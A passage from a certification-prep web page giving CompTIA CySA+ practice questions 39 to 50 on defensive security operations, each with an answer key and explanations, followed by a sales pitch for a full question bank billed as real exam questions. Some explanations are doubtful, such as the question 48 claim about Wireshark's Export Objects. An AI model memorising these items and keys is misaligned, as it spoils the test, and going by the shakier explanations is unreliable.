Ensure that the case details do not reflect any user- identifiable information Password protect the evidence and restrict access to personnel related to the investigation To ensure compliance with HR and privacy policies when conducting an investigation that could result in employment action, the organization must minimize personally identifiable information (PII) exposure in documentation, restrict access to evidence only to those with a legitimate need to know, and implement security controls like password protection. This approach protects the employee's privacy rights while maintaining the integrity of the investigation and reduces organizational legal liability under privacy and employment laws.

Why the other options are wrong:

  • A. Creating a timeline with identifying information violates privacy principles; identifiers should be minimized.
  • C. Using code names does not comply with privacy policies; access controls are required, not obfuscation.
  • D. Notifying the manager after confirmation is process-related but does not address privacy protection of evidence.

Question 39

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

  • A. SLA
  • B. MOU
  • C. NDA
  • D. Limitation of liability
Show answer and explanation ▾

Correct answer: A

A Service Level Agreement (SLA) defines specific contractual commitments regarding service delivery, including response times, resolution times, and reporting obligations. The SOC manager should consult the SLA to verify the contractual timeline for remediation follow-up after vulnerability reporting.

Why the other options are wrong:

  • B. An MOU (Memorandum of Understanding) is a less formal agreement and doesn't typically contain specific service timing requirements
  • C. An NDA (Non-Disclosure Agreement) covers confidentiality obligations, not service delivery commitments
  • D. Limitation of liability clauses restrict legal responsibility but don't establish service level commitments

Question 40

Which of the following would help to minimize human engagement and aid in process improvement in security operations?

  • A. OSSTMM
  • B. SIEM
  • C. SOAR
  • D. OWASP
Show answer and explanation ▾

Correct answer: C

SOAR (Security Orchestration, Automation and Response) is specifically designed to minimize human engagement by automating repetitive security tasks and orchestrating responses across multiple tools. This directly supports process improvement in security operations by reducing manual work, improving response times, and enabling analysts to focus on higher-level tasks.

Why the other options are wrong:

  • A. OSSTMM is a testing methodology framework, not an automation platform.
  • B. SIEM is a log aggregation and analysis tool that still requires human interpretation and decision-making.
  • D. OWASP is a web application security framework, not related to security operations automation.

Question 41

Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

  • A. Command and control
  • B. Actions on objectives
  • C. Exploitation
  • D. Delivery
Show answer and explanation ▾

Correct answer: A

The Command and Control (C2) phase is when the attacker establishes a communication channel with the compromised target to issue commands and maintain persistent access. This occurs after successful exploitation and is fundamental to the attacker maintaining control over the compromised system.

Why the other options are wrong:

  • B. Actions on objectives occurs after C2 is established and involves the attacker achieving their goals
  • C. Exploitation is when vulnerabilities are triggered, occurring before C2 communication is established
  • D. Delivery is when the exploit payload is delivered to the target, occurring before exploitation

Question 42

An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?

  • A. Proprietary systems
  • B. Legacy systems
  • C. Unsupported operating systems
  • D. Lack of maintenance windows
Show answer and explanation ▾

Correct answer: A

The core issue is that the company lacks access to update a vendor appliance due to vendor control and proprietary restrictions. This is a proprietary system inhibitor-the company cannot modify or patch the system because they don't have control over it. The system is vendor-dependent and the company cannot independently remediate the vulnerabilities.

Why the other options are wrong:

  • B. Legacy systems are outdated but can typically be upgraded or replaced; the issue here is lack of vendor access.
  • C. Unsupported operating systems would be out of vendor support, but the problem is the proprietary appliance itself.
  • D. The problem is not maintenance windows but rather inability to access the vendor appliance to update it.

Question 43

New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?

  • A. Human resources must email a copy of a user agreement to all new employees
  • B. Supervisors must get verbal confirmation from new employees indicating they have read the user agreement
  • C. All new employees must take a test about the company security policy during the onboardmg process
  • D. All new employees must sign a user agreement to acknowledge the company security policy
Show answer and explanation ▾

Correct answer: D

A signed user agreement creates legal accountability and documented acknowledgment of the policy. This establishes that the employee cannot claim ignorance and ensures they are legally bound to comply with company policies. Email alone (option A) lacks confirmation of receipt or comprehension. Verbal confirmation (option B) is not documented and difficult to verify. A test (option C) verifies understanding but doesn't create the same level of accountability as a signed acknowledgment. A signature on a user agreement is the standard practice across organizations for establishing accountability.

Why the other options are wrong:

  • A. Email delivery cannot verify that the employee actually read or understood the policy.
  • B. Verbal confirmation is not documented and provides no legal record of acknowledgment.
  • C. A test measures knowledge but doesn't create binding accountability or legal acknowledgment.

Question 44

An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?

  • A. Information sharing organization
  • B. Blogs/forums
  • C. Cybersecurity incident response team
  • D. Deep/dark web
Show answer and explanation ▾

Correct answer: A

An information sharing organization (such as ISACs or ISAOs specific to critical infrastructure or manufacturing) is the best source for threat intelligence about campaigns targeting critical supply chain entities. These organizations specialize in sharing threats relevant to specific sectors and critical infrastructure. Blogs/forums (option B) provide general information but lack sector-specific context. The incident response team (option C) investigates but isn't a primary intelligence source for new campaigns. The dark web (option D) is not a reliable or appropriate source for supply chain threat intelligence.

Why the other options are wrong:

  • B. Blogs and forums lack verified, sector-specific threat intelligence relevant to critical manufacturing.
  • C. The incident response team responds to incidents but isn't a source for external threat campaign research.
  • D. The dark web is unreliable, unverified, and not the appropriate channel for critical infrastructure threat intelligence.

Question 45

A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?

  • A. The current scanners should be migrated to the cloud
  • B. Cloud-specific misconfigurations may not be detected by the current scanners
  • C. Existing vulnerability scanners cannot scan IaaS systems
  • D. Vulnerability scans on cloud environments should be performed from the cloud
Show answer and explanation ▾

Correct answer: B

Cloud-specific misconfigurations such as overly permissive IAM policies, exposed storage buckets, insecure API endpoints, and misconfigured security groups may not be detected by traditional on-premises vulnerability scanners designed for network and system vulnerabilities. These scanners typically focus on CVEs and application-level issues, not the configuration vulnerabilities endemic to IaaS platforms like AWS, Azure, or GCP. The organization must augment its scanning program with cloud-native security tools.

Why the other options are wrong:

  • A. Migrating existing scanners to cloud is not necessary; specialized cloud scanners can supplement them.
  • C. Existing vulnerability scanners can scan systems in IaaS, though they have limitations.
  • D. Scans can be performed from on-premises or cloud; location is not the primary issue.

Question 46

A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?

  • A. C2 beaconing activity
  • B. Data exfiltration
  • C. Anomalous activity on unexpected ports
  • D. Network host IP address scanning
  • E. A rogue network device
Show answer and explanation ▾

Correct answer: A

Regular outgoing HTTPS connections to a public IP address around the clock, to a destination the server should not contact, is classic command-and-control (C2) beaconing behavior. The consistency of the pattern and the fact it occurs during both work and after- hours indicates automated malicious communication rather than legitimate business activity. Data exfiltration (option B) may use HTTPS but wouldn't necessarily show regular patterns. Anomalous ports (option C) is vague and less specific. IP scanning (option D) and rogue devices (option E) don't match the described behavior pattern.

Why the other options are wrong:

  • B. Data exfiltration would typically involve larger data transfers rather than regular small connection patterns.
  • C. This describes the symptom but not the most likely cause; HTTPS uses expected ports.
  • D. Host scanning would show different network behavior patterns, not regular connections to a single IP.
  • E. A rogue device would not explain outgoing connections originating from the specific server.

Question 47

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

  • A. External
  • B. Agent-based
  • C. Non-credentialed
  • D. Credentialed
Show answer and explanation ▾

Correct answer: B

Agent-based scanning is the best solution for geographically diverse workforces with dynamic IPs because agents are installed on individual systems and report back to a central server, eliminating the need for the scanner to maintain network connectivity to target systems. This reduces network traffic compared to external scanning which must traverse networks, and agents can work regardless of IP changes or geographic location.

Why the other options are wrong:

  • A. External scanning requires network-level access and generates significant traffic across diverse geographic locations.
  • C. Non-credentialed scanning still requires network connectivity and generates traffic during scanning.
  • D. Credentialed scanning still requires network access and traffic similar to non- credentialed methods.

Question 48

A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?

  • A. Change the display filter to ftp.active.port
  • B. Change the display filter to tcp.port==20
  • C. Change the display filter to ftp-data and follow the TCP streams
  • D. Navigate to the File menu and select FTP from the Export objects option
Show answer and explanation ▾

Correct answer: C

FTP data transfers occur on a separate data channel (port 20 by default) from the FTP control channel (port 21). The ftp filter shows control commands but not the actual file contents. Using 'ftp-data' to show data stream packets and following the TCP streams allows the analyst to reconstruct and view the complete downloaded files.

Why the other options are wrong:

  • A. ftp.active.port is an FTP filter for active mode port negotiation, not for viewing transferred data
  • B. tcp.port==20 would show the data channel packets but not reconstruct the file contents without following the streams
  • D. The File menu export option exports objects from HTTP/HTTPS, not FTP data streams

Question 49

A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?

  • A. Firewall logs
  • B. Indicators of compromise
  • C. Risk assessment
  • D. Access control lists
Show answer and explanation ▾

Correct answer: C

A risk assessment provides comprehensive analysis of threats, vulnerabilities, likelihood, and business impact organized at a strategic level suitable for executive consumption. It synthesizes threat information with organizational context to support decision-making, whereas the other options provide lower-level operational data.

Why the other options are wrong:

  • A. Firewall logs contain tactical network data but lack the risk prioritization and business context needed for executives
  • B. Indicators of compromise are specific forensic artifacts, not strategic threat analysis suitable for executive briefings
  • D. Access control lists are configuration details unrelated to threat analysis

Question 50

Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

  • A. Develop a call tree to inform impacted users
  • B. Schedule a review with all teams to discuss what occurred
  • C. Create an executive summary to update company leadership
  • D. Review regulatory compliance with public relations for official notification
Show answer and explanation ▾

Correct answer: B

After an incident concludes, the best action for future improvement is to conduct a post- incident review with all relevant teams to discuss what happened, what went well, what didn't, and what can be improved. This lessons-learned session is critical for improving incident response capabilities and preventing recurrence.

Why the other options are wrong:

  • A. A call tree is used during incident response, not after to improve future response.
  • C. An executive summary documents the incident but doesn't directly improve future response.
  • D. Regulatory compliance review is important but secondary to learning from the incident internally.

Get the complete CS0-003 bank

These 50 questions are about 10% of what is on the exam. The full pack has 627 real CS0-003 questions, every MCQ and PBQ, each with the same depth of explanation, plus a questions-only PDF for timed practice and free updates forever.

View the full CompTIA CySA+ question bank →

Related exams

Browse free practice questions for every exam →

Back to blog